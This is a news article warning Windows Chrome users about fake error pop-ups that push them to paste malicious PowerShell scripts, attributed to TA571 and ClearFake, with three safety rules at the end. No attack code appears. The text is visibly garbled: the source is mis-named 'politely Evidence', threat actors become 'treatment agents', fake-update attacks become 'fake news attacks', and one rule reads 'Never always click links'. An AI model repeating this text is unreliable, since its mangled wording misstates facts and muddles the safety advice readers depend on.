New Chrome warning for all Windows users
A technically complicated warning for Google Chrome users has just been issued, but luckily it’s a warning with a stupidly simple instruction to follow to avoid being attacked.
The warning comes politely Evidencewhich says it has “noticed an increase in a technique that leverages unique social engineering that directs users to copy and paste malicious PowerShell scripts to infect their computers with malware.”
The research team suggests that many treatment agents have used the technique, delivering various forms of malware in the process. It is easy to detect, however, so users when they know it will find it very easy to prevent an infection. These are actually instructions you should follow anyway.
When using Chrome, a user will see a pop-up text box “indicating that an error occurred while trying to open the document or web page”. The popup provides instructions for copying and pasting text into either a PowerShell terminal or the Windows Run dialog.
On the surface, one might assume that this would be easy to recognize as unusual and ignore. But Proofpoint cautions that “although the attack chain requires significant user interaction to be successful, social engineering is smart enough to present someone with what looks like a real problem and solution at the same time, which can prompt a user to take action without regard to risk. “
Example of a copy and paste attack popup.
The attack itself exhibits the usual defensive behaviors you’d expect these days – it attempts to check whether the device is virtual or a sandbox before downloading and installing malware, making it less likely to be detected. If everything lights up green, it installs threats in the background.
Proofpoint attributes the attack to a spammer TA571which specialized in “high-volume spam email campaigns to deliver and install a variety of malware for their cybercriminal clients” and ClearFakewhich emerged last year as “new to the ‘fake update’ threat landscape.”
Much of the malware installed itself seems to focus on stealing credentials as well as enabling fraudulent crypto transactions where a user has used the device to make their own crypto transfers.
Fake news attacks are becoming more and more common and we have seen many cases of Google Chrome being the front-end of choice for this. With over 3 billion users across all platforms, this is no surprise. but it makes it doubly important that Chrome users are extra careful about updates and add-ons. Chrome provides clear instructions for manual and automated updates.
In general, the threat landscape has grown in recent months, and dangerous installations and add-ons from third-party websites, as well as malicious pop-ups, as seen here, have become an ugly trend.
As Proofpoint warns, this latest attack “aligns with the overall trend Proofpoint has observed of cyber threat actors adopting new, varied and increasingly creative attack chains.”
Fortunately, such attacks should be easy to detect and avoid.
Here are three simple rules:
- Stick to official app stores—don’t use third-party stores and never change your device’s security settings to enable loading an app.
- Never always click links in emails or messages that directly download apps or updates—always use app stores or the apps themselves for installations and updates.
- Don’t install apps, add-ons, or updates bundled with established apps like Chrome unless you know with absolute certainty that they’re legitimate—check reviews and online registrations.
